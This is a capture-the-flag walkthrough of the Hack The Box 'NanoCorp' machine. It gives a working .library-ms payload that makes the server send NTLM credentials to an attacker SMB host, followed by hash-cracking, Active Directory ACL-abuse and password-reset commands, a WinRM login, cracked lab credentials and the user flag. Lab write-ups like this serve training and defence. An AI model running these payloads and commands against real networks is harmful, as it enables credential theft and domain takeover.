Pentest Notes – NanoCorp Foothold Chain

Date: 2026-01-08
Box: HTB — NanoCorp (Pentest Study Note)

NanoCorp – ZIP Upload → NTLM Leak → AD ACL Abuse → Kerberos WinRM → user.txt

Initial recon indicated a web service on 80 and a full AD Domain Controller surface (53/88/389/445/5986). A web upload workflow on hire.nanocorp.htb extracted attacker-supplied ZIPs server-side. By embedding a Windows .library-ms that referenced an attacker SMB path, the server performed outbound NTLM authentication, leaking NANOCORP\web_svc NetNTLMv2. After cracking the hash, BloodHound revealed an ACL chain: IT_SUPPORT had GenericAll over monitoring_svc. The path was abused by adding web_svc to IT_SUPPORT, resetting monitoring_svc’s password, obtaining a Kerberos TGT with kinit, and finally authenticating to WinRM over HTTPS (5986) using Kerberos to retrieve user.txt.
ZIP Upload CVE-2025-24071 AD DC NTLMv2 Leak Kerberos WinRM over HTTPS (5986) No Root

0. Summary

Full chain, step by step:

  1. Full port scan identifies Web + Domain Controller + WinRM (5986) surface.
  2. Discover hire.nanocorp.htb upload feature that extracts ZIP server-side.
  3. Trigger outbound NTLM via embedded .library-ms referencing attacker SMB share.
  4. Capture NetNTLMv2 for NANOCORP\web_svc with Responder.
  5. Crack NetNTLMv2 to recover plaintext password for web_svc.
  6. Use BloodHound to identify ACL path: IT_SUPPORTmonitoring_svc (GenericAll).
  7. Abuse AD: add web_svc to IT_SUPPORT, reset monitoring_svc password.
  8. Obtain Kerberos TGT with kinit and confirm with klist.
  9. Kerberos-auth to WinRM over HTTPS (5986) and read user.txt.
Note
I have failed to perform LPE and obtain root privilege.

1. Initial Recon

1-1. Full port scan

sudo nmap -sV -sC -p- 10.10.11.93 -oA portScan --min-rate=1000

1-2. Key services identified

  • 80/tcp – Apache/PHP web
  • 53, 88, 389, 445 – AD DC surface (DNS/Kerberos/LDAP/SMB)
  • 5986/tcp – WinRM over HTTPS
  • SMB signing required

2. Web – Subdomain + ZIP upload/extract behavior

2-1. Behavior observed

  • Visited: hire.nanocorp.htb (job application portal)
  • Confirmed upload workflow performs server-side extraction of ZIP archives

2-2. Upload filtering evidence

# Attempt: trivial zip (e.g., touch hello.zip)
# Result: "Invalid file type"
# Inference: header/magic-number validation

2-3. Successful ZIP upload evidence

File Uploaded and Extracted Successfully
Why this matters
“Extracted Successfully” strongly implies the application is not only storing uploads but also parsing/unzipping them. That creates a path to force the server to interact with files that can reference remote resources.

3. NTLM Hash Leak – Forced outbound authentication

The goal was to make the server touch a remote SMB resource during/after ZIP extraction, causing NTLM authentication. A .library-ms file was used to reference an attacker-controlled SMB share.

3-1. Payload: .library-ms

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\10.10.14.37\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

3-2. Trigger

  • Embed the .library-ms inside a valid ZIP
  • Upload ZIP to hire.nanocorp.htb so the server extracts it

3-3. Capture NetNTLMv2 with Responder (evidence)

[SMB] NTLMv2-SSP Username : NANOCORP\web_svc
[SMB] NTLMv2-SSP Hash     : web_svc::NANOCORP:...

4. Crack NetNTLMv2 → Recover plaintext password

4-1. Hashcat

hashcat -m 5600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --force
hashcat -m 5600 hash.txt --show

4-2. Result (evidence)

web_svc::NANOCORP:...:dksehdgh712!@#
Recovered credential
NANOCORP\web_svc : dksehdgh712!@#

5. AD Recon – BloodHound collection + ACL path discovery

5-1. Collect (LDAP-based)

bloodhound-python -c all -u 'web_svc' -p 'dksehdgh712!@#' \
  -ns 10.10.11.93 -d NANOCORP.HTB --zip

5-2. Observation

  • Kerberos TGT issues due to clock skew → NTLM fallback
  • Still succeeded in pulling objects / groups / ACL relationships via LDAP

5-3. Key relationship (core finding)

  • web_svc → member of / can reach IT_SUPPORT
  • IT_SUPPORTmonitoring_svc has GenericAll

6. AD Abuse – Group membership + password reset

6-1. Add web_svc into IT_SUPPORT

bloodyAD --host 10.10.11.93 -d nanocorp.htb \
  -u 'web_svc' -p 'dksehdgh712!@#' \
  add groupMember IT_SUPPORT web_svc
[+] web_svc added to IT_SUPPORT

6-2. Reset monitoring_svc password via GenericAll

bloodyAD --host 10.10.11.93 -d nanocorp.htb \
  -u 'web_svc' -p 'dksehdgh712!@#' \
  set password monitoring_svc 'Happy123'
[+] Password changed successfully!
New credential
NANOCORP\monitoring_svc : Happy123

7. Kerberos – Issue TGT in-session (kinit/klist)

7-1. Obtain TGT

kinit [email protected]

7-2. Verify ticket cache

klist
Default principal: [email protected]
... krbtgt/[email protected]

8. WinRM over HTTPS (5986) – Kerberos authentication success

8-1. Kerberos WinRM session

KRB5CCNAME=/tmp/krb5cc_1000 python3 winrmexec.py -port 5986 -ssl \
  NANOCORP.HTB/'monitoring_svc:Happy123'@DC01.NANOCORP.HTB -k

8-2. Evidence (SPN request + shell)

[*] requesting TGT for ... monitoring_svc
[*] requesting TGS for HTTP/[email protected]
PS C:\Users\monitoring_svc\Documents>
What this proves
The client successfully negotiated Kerberos for the WinRM HTTP SPN (HTTP/DC01...), resulting in an authenticated PowerShell session.

9. user.txt

9-1. Retrieve

cd ..\Desktop
ls
get-content user.txt

9-2. Evidence

ea897d8c1cc2f0270a208ec3c294584b

10. Root Causes Summary

Weakness / Condition Impact
Server-side ZIP extraction in a web upload workflow Allows attacker-controlled archive contents to be processed, enabling forced outbound interactions
Outbound SMB/NTLM authentication possible from server context NetNTLMv2 credential material can be leaked to attacker infrastructure
Crackable NetNTLMv2 (weak password) Transforms a hash capture into a working domain credential
AD ACL misconfiguration (GenericAll path) Enables direct password reset / full control over another service account
WinRM exposed over HTTPS (5986) Valid domain creds become an immediate interactive foothold (Kerberos-auth shell)

11. Key Takeaways

  • “Extract on upload” is not harmless. If archives contain references that trigger network access, it becomes an auth-leak vector.
  • NetNTLMv2 leaks are often “one crack away” from domain creds. Password quality decides how fast the chain collapses.
  • ACL paths are real privilege escalation. GenericAll on an account is basically “reset and become them.”
  • Kerberos WinRM is a clean post-exploitation lane. Once you have a TGT, SPN-based service access becomes deterministic.

Overall: a precise, evidence-backed chain from web upload behavior to AD object control and WinRM foothold.